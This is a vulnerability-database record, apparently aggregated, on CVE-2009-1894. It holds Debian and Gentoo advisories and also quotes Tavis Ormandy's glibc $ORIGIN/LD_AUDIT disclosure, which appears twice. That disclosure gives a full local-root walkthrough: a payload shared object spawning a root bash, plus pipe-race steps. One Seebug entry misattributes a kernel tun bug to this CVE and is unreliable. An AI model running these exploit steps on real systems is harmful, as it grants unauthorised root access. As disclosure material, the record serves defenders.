http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 391866 aaa17f0fcfa72656840f5bea493aff1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 64034 5248974c7b2bd5d1353741ceb4eb6392\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 351832 ee16cc3391e7819f299e71d0013903b2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 101580 24faa396862fcc9b4c29b530382184fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 261054 f351146c55677ec3f16a728d254c56f0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67958 0dd121a16e0eec31c07cba4832fe845d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67122 cab4efcc68c29ed251c818fd590a1e61\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 79168 33d184042be0a8133cad9b244b88dc4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93242 b42621e1fda017e93045ed4efd87b56f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 174586 e1aaa6e1a9b6aa1af1dcb0c8b414a10d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 60278 bc1218b7eca8891a367f7c880cf5022f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 617574 fd0bedd20efa06edde82525e9e2330b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 331682 552d2a40027cde0d1a9cc8360fad0ace\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 190684 e71731d57b84a892f0683e5b52f7557b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-07-18T12:18:19", "type": "debian", "title": "[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T12:18:19", "id": "DEBIAN:DSA-1838-1:2C084", "href": "https://lists.debian.org/debian-security-announce/2009/msg00152.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-02-27T07:38:52", "description": "Race condition in PulseAudio 0.9.9, 0.9.10, and 0.9.14 allows local users to gain privileges via vectors involving creation of a hard link, related to the application setting LD_BIND_NOW to 1, and then calling execv on the target of the /proc/self/exe symlink.", "cvss3": {}, "published": "2009-07-17T16:30:00", "type": "debiancve", "title": "CVE-2009-1894", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-17T16:30:00", "id": "DEBIANCVE:CVE-2009-1894", "href": "https://security-tracker.debian.org/tracker/CVE-2009-1894", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2022-01-17T19:14:09", "description": "### Background\n\nPulseAudio is a network-enabled sound server with an advanced plug-in system. \n\n### Description\n\nTavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself. The vulnerability has independently been reported to oCERT by Yorick Koster. \n\n### Impact\n\nA local user who has write access to any directory on the file system containing /usr/bin can exploit this vulnerability using a race condition to execute arbitrary code with root privileges. \n\n### Workaround\n\nEnsure that the file system holding /usr/bin does not contain directories that are writable for unprivileged users. \n\n### Resolution\n\nAll PulseAudio users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-sound/pulseaudio-0.9.9-r54\"", "cvss3": {}, "published": "2009-07-16T00:00:00", "type": "gentoo", "title": "PulseAudio: Local privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-16T00:00:00", "id": "GLSA-200907-13", "href": "https://security.gentoo.org/glsa/200907-13", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T18:43:01", "description": "BUGTRAQ ID: 35724\r\nCVE(CAN) ID: CVE-2009-1894\r\n\r\nLinux Kernel\u662f\u5f00\u653e\u6e90\u7801\u64cd\u4f5c\u7cfb\u7edfLinux\u6240\u4f7f\u7528\u7684\u5185\u6838\u3002\r\n\r\nLinux Kernel\u7684drivers/net/tun.c\u6587\u4ef6\u4e2d\u7684tun_chr_poll()\u51fd\u6570\u5b58\u5728\u7a7a\u6307\u9488\u5f15\u7528\u9519\u8bef\uff1a\r\n\r\n int fd;\r\n struct pollfd pfd;\r\n fd = open("/dev/net/tun", O_RDWR);\r\n pfd.fd = fd;\r\n pfd.events = POLLIN | POLLOUT;\r\n poll(&pfd, 1, 0);\r\n\r\n\u5982\u679c\u7528\u6237\u5bf9tun\u8bbe\u5907\u6267\u884c\u4e86open()\u548cpoll()\u64cd\u4f5c\uff0c\u5c31\u53ef\u4ee5\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u5d29\u6e83\u6216\u4ee5root\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\u6210\u529f\u653b\u51fb\u8981\u6c42\u4f7f\u7528GCC\u7684-fdelete-null-pointer-checks\u4f18\u5316\u7f16\u8bd1\u4e86\u5185\u6838\u3002\n\nLinux kernel 2.6.30\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLinux\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3c8a9c63d5fd738c261bd0ceece04d9c8357ca13", "cvss3": {}, "published": "2009-07-20T00:00:00", "type": "seebug", "title": "Linux Kernel tun_chr_pool()\u51fd\u6570\u7a7a\u6307\u9488\u5f15\u7528\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-11842", "id": "SSV:11842", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T15:37:59", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "GNU C library dynamic linker $ORIGIN expansion Vulnerability", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-1894", "CVE-2010-3847"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70027", "id": "SSV:70027", "sourceData": "\n from: http://marc.info/?l=full-disclosure&m=128739684614072&w=2\r\n\r\nThe GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. */\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n system("/bin/bash");\r\n}\r\n^D\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n$ ls -l /tmp/exploit\r\n-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*\r\n\r\n# Now force the link in /proc to load $ORIGIN via LD_AUDIT.\r\n$ LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/3\r\nsh-4.1# whoami\r\nroot\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIt is a good idea to prevent users from creating files on filesystems mounted\r\nwithout nosuid. The following interesting solution for administrators who\r\ncannot modify their partitioning scheme was suggested to me by Rob Holland\r\n(@robholland):\r\n\r\nYou can use bind mounts to make directories like /tmp, /var/tmp, etc., nosuid,\r\nfor example:\r\n\r\n# mount -o bind /tmp /tmp\r\n# mount -o remount,bind,nosuid /tmp /tmp\r\n\r\nBe aware of race conditions at boot via crond/atd/etc, and users with\r\nreferences to existing directories (man lsof), but this may be an acceptable\r\nworkaround until a patch is ready for deployment.\r\n\r\n(Of course you need to do this everywhere untrusted users can make links to\r\nsuid/sgid binaries. find(1) is your friend).\r\n\r\nIf someone wants to create an init script that would automate this at boot for\r\ntheir distribution, I'm sure it would be appreciated by other administrators.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMajor distributions should be releasing updated glibc packages shortly.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Hawkes, Julien, LiquidK, Lcamtuf, Neel, Spoonm, Felix, Robert,\r\nAsirap, Spender, Pipacs, Gynvael, Scarybeasts, Redpig, Kees, Eugene, Bruce D.,\r\nand all my other elite friends and colleagues.\r\n\r\nAdditional greetz to the openwall guys who saw this problem coming years ago.\r\nThey continue to avoid hundreds of security vulnerabilities each year thanks to\r\ntheir insight into systems security.\r\n\r\nhttp://www.openwall.com/owl/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nThere are several known techniques to exploit dynamic loader bugs for suid\r\nbinaries, the fexecve() technique listed in the Consequences section above is a\r\nmodern technique, making use of relatively recent Linux kernel features (it was\r\nfirst suggested to me by Adam Langley while discussing CVE-2009-1894, but I\r\nbelieve Gabriel Campana came up with the same solution independently).\r\n\r\nThe classic UNIX technique is a little less elegant, but has the advantage that\r\nread access is not required for the target binary. It is rather common for\r\nadministrators to remove read access from suid binaries in order to make\r\nattackers work a little harder, so I will document it here for reference.\r\n\r\nThe basic idea is to create a pipe(), fill it up with junk (pipes have 2^16\r\nbytes capacity on Linux, see the section on "Pipe Capacity" in pipe(7) from the\r\nLinux Programmers Manual), then dup2() it to stderr. Following the dup2(),\r\nanything written to stderr will block, so you simply execve() and then make the\r\nloader print some error message, allowing you to reliably win any race\r\ncondition.\r\n\r\nLD_DEBUG has always been a a good candidate for getting error messages on\r\nLinux. The behaviour of LD_DEBUG was modified a few years ago in response to\r\nsome minor complaints about information leaks, but it can still be used with a\r\nslight modification (I first learned of this technique from a bugtraq posting\r\nby Jim Paris in 2004, http://seclists.org/bugtraq/2004/Aug/281).\r\n\r\nThe exploit flow for this alternative attack is a little more complicated, but\r\nwe can still use the shell to do it (this session is from an FC13 system,\r\noutput cleaned up for clarity).\r\n\r\n# Almost fill up a pipe with junk, then dup2() it to stderr using redirection.\r\n$ (head -c 65534 /dev/zero; LD_DEBUG=nonsense LD_AUDIT="\\$ORIGIN" /tmp/exploit/target 2>&1) | (sleep 1h; cat) &\r\n[1] 26926\r\n\r\n# Now ld.so is blocked on write() in the background trying to say "invalid\r\n# debug option", so we are free to manipulate the filesystem.\r\n$ rm -rf /tmp/exploit/\r\n\r\n# Put exploit payload in place.\r\n$ gcc -w -fPIC -shared -o /tmp/exploit payload.c\r\n\r\n# Clear the pipe by killing sleep, letting cat drain the contents. This will\r\n# unblock the target, allowing it to continue.\r\n$ pkill -n -t $(tty | sed 's#/dev/##') sleep\r\n-bash: line 99: 26929 Terminated sleep 1h\r\n\r\n# And now we can take control of a root shell :-)\r\n$ fg\r\nsh-4.1# id\r\nuid=0(root) gid=500(taviso)\r\n\r\nAnother technique I'm aware of is setting a ridiculous LD_HWCAP_MASK, then\r\nwhile the loader is trying to map lots of memory, you have a good chance of\r\nwinning any race. I previously found an integer overflow in this feature and\r\nsuggested adding LD_HWCAP_MASK to the unsecure vars list, however the glibc\r\nmaintainers disagreed and just fixed the overflow.\r\n\r\nhttp://www.cygwin.com/ml/libc-hacker/2007-07/msg00001.html\r\n\r\nI believe this is still a good idea, and LD_HWCAP_MASK is where I would bet the\r\nnext big loader bug is going to be, it's just not safe to let attackers have\r\nthat much control over the execution environment of privileged programs.\r\n\r\nFinally, some notes on ELF security for newcomers. The following common\r\nconditions are usually exploitable:\r\n\r\n - An empty DT_RPATH, i.e. -Wl,-rpath,""\r\n This is a surprisingly common build error, due to variable expansion\r\n failing during the build process.\r\n - A relative, rather than absolute DT_RPATH.\r\n For example, -Wl,-rpath,"lib/foo".\r\n\r\nI'll leave it as an exercise for the interested reader to explain why. Remember\r\nto also follow DT_NEEDED dependencies, as dependencies can also declare rpaths\r\nfor their dependencies, and so on.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\n- http://man.cx/ld.so%288%29, The dynamic linker/loader, Linux Programmer's Manual.\r\n- http://man.cx/rtld-audit, The auditing API for the dynamic linker, Linux Programmer's Manual.\r\n- http://man.cx/pipe%287%29, Overview of pipes and FIFOs (Pipe Capacity), Linux Programmer's Manual.\r\n- Linkers and Loaders, John R. Levine, ISBN 1-55860-496-0.\r\n- Partitioning schemes and security, http://my.opera.com/taviso/blog/show.dml/654574\r\n- CVE-2009-1894 description, http://blog.cr0.org/2009/07/old-school-local-root-vulnerability-in.html\r\n\r\nYou should subscribe to Linux Weekly News and help support their high standard\r\nof security journalism.\r\n\r\nhttp://lwn.net/\r\n\r\nI have a twitter account where I occasionally comment on security topics.\r\n\r\nhttp://twitter.com/taviso\r\n\r\nex$$\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-70027", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2021-06-08T19:10:23", "description": "Race condition on temporary files creation allow symlink attack.", "edition": 2, "cvss3": {}, "published": "2009-07-18T00:00:00", "title": "PulseAudio race conditions", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-1894"], "modified": "2009-07-18T00:00:00", "id": "SECURITYVULNS:VULN:10079", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10079", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "The GNU C library dynamic linker expands $ORIGIN in setuid library search path\r\n------------------------------------------------------------------------------\r\n\r\nGruezi, This is CVE-2010-3847.\r\n\r\nThe dynamic linker (or dynamic loader) is responsible for the runtime linking of\r\ndynamically linked programs. ld.so operates in two security modes, a permissive\r\nmode that allows a high degree of control over the load operation, and a secure\r\nmode (libc_enable_secure) intended to prevent users from interfering with the\r\nloading of privileged executables.\r\n\r\n$ORIGIN is an ELF substitution sequence representing the location of the\r\nexecutable being loaded in the filesystem hierarchy. The intention is to allow\r\nexecutables to specify a search path for libraries that is relative to their\r\nlocation, to simplify packaging without spamming the standard search paths with\r\nsingle-use libraries.\r\n\r\nNote that despite the confusing naming convention, $ORIGIN is specified in a\r\nDT_RPATH or DT_RUNPATH dynamic tag inside the executable itself, not via the\r\nenvironment (developers would normally use the -rpath ld parameter, or\r\n-Wl,-rpath,$ORIGIN via the compiler driver).\r\n\r\nThe ELF specification suggests that $ORIGIN be ignored for SUID and SGID\r\nbinaries,\r\n\r\nhttp://web.archive.org/web/20041026003725/http://www.caldera.com/developers/gabi/2003-12-17/ch5.dynamic.html#substitution\r\n\r\n"For security, the dynamic linker does not allow use of $ORIGIN substitution\r\n sequences for set-user and set-group ID programs. For such sequences that\r\n appear within strings specified by DT_RUNPATH dynamic array entries, the\r\n specific search path containing the $ORIGIN sequence is ignored (though other\r\n search paths in the same string are processed). $ORIGIN sequences within a\r\n DT_NEEDED entry or path passed as a parameter to dlopen() are treated as\r\n errors. The same restrictions may be applied to processes that have more than\r\n minimal privileges on systems with installed extended security mechanisms."\r\n\r\nHowever, glibc ignores this recommendation. The attack the ELF designers were\r\nlikely concerned about is users creating hardlinks to suid executables in\r\ndirectories they control and then executing them, thus controlling the\r\nexpansion of $ORIGIN.\r\n\r\nIt is tough to form a thorough complaint about this glibc behaviour however,\r\nas any developer who believes they're smart enough to safely create suid\r\nprograms should be smart enough to understand the implications of $ORIGIN\r\nand hard links on load behaviour. The glibc maintainers are some of the\r\nsmartest guys in free software, and well known for having a "no hand-holding"\r\nstance on various issues, so I suspect they wanted a better argument than this\r\nfor modifying the behaviour (I pointed it out a few years ago, but there was\r\nlittle interest).\r\n\r\nHowever, I have now discovered a way to exploit this. The origin expansion\r\nmechanism is recycled for use in LD_AUDIT support, although an attempt is made\r\nto prevent it from working, it is insufficient.\r\n\r\nLD_AUDIT is intended for use with the linker auditing api (see the rtld-audit\r\nmanual), and has the usual restrictions for setuid programs as LD_PRELOAD does.\r\nHowever, $ORIGIN expansion is only prevented if it is not used in isolation.\r\n\r\nThe codepath that triggers this expansion is\r\n\r\n _dl_init_paths() -> _dl_dst_substitute() -> _is_dst()\r\n\r\n(in the code below DST is dynamic string token)\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l741\r\n\r\n 741 /* Expand DSTs. */\r\n 742 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 743 if (__builtin_expect (cnt == 0, 1))\r\n 744 llp_tmp = strdupa (llp);\r\n 745 else\r\n 746 {\r\n 747 /* Determine the length of the substituted string. */\r\n 748 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 749\r\n 750 /* Allocate the necessary memory. */\r\n 751 llp_tmp = (char *) alloca (total + 1);\r\n 752 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 753 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l245\r\n\r\n 253 if (__builtin_expect (*name == '$', 0))\r\n 254 {\r\n 255 const char *repl = NULL;\r\n 256 size_t len;\r\n 257\r\n 258 ++name;\r\n 259 if ((len = is_dst (start, name, "ORIGIN", is_path,\r\n 260 INTUSE(__libc_enable_secure))) != 0)\r\n 261 {\r\n ...\r\n 267 repl = l->l_origin;\r\n 268 }\r\n\r\nhttp://sourceware.org/git/?p=glibc.git;a=blob;f=elf/dl-load.c;h=a7162eb77de7a538235a4326d0eb9ccb5b244c01;hb=HEAD#l171\r\n\r\n\r\n 202 if (__builtin_expect (secure, 0)\r\n 203 && ((name[len] != '\0' && (!is_path || name[len] != ':'))\r\n 204 || (name != start + 1 && (!is_path || name[-2] != ':'))))\r\n 205 return 0;\r\n 206\r\n 207 return len;\r\n 208 }\r\n\r\nAs you can see, $ORIGIN is only expanded if it is alone and first in the path.\r\nThis makes little sense, and does not appear to be useful even if there were\r\nno security impact. This was most likely the result of an attempt to re-use the\r\nexisting DT_NEEDED resolution infrastructure for LD_AUDIT support, accidentally\r\nintroducing this error.\r\n\r\nPerhaps surprisingly, this error is exploitable.\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least the following versions have been tested\r\n\r\n 2.12.1, FC13\r\n 2.5, RHEL5 / CentOS5\r\n\r\nOther versions are probably affected, possibly via different vectors. I'm aware\r\nseveral versions of ld.so in common use hit an assertion in dl_open_worker, I\r\ndo not know if it's possible to avoid this.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nIt is possible to exploit this flaw to execute arbitrary code as root.\r\n\r\nPlease note, this is a low impact vulnerability that is only of interest to\r\nsecurity professionals and system administrators. End users do not need\r\nto be concerned.\r\n\r\nExploitation would look like the following.\r\n\r\n# Create a directory in /tmp we can control.\r\n$ mkdir /tmp/exploit\r\n\r\n# Link to an suid binary, thus changing the definition of $ORIGIN.\r\n$ ln /bin/ping /tmp/exploit/target\r\n\r\n# Open a file descriptor to the target binary (note: some users are surprised\r\n# to learn exec can be used to manipulate the redirections of the current\r\n# shell if a command is not specified. This is what is happening below).\r\n$ exec 3< /tmp/exploit/target\r\n\r\n# This descriptor should now be accessible via /proc.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*\r\n\r\n# Remove the directory previously created\r\n$ rm -rf /tmp/exploit/\r\n\r\n# The /proc link should still exist, but now will be marked deleted.\r\n$ ls -l /proc/$$/fd/3\r\nlr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target\r\n(deleted)\r\n\r\n# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to\r\ndlopen().\r\n$ cat > payload.c\r\nvoid __attribute__((constructor)) init()\r\n{\r\n setuid(0);\r\n 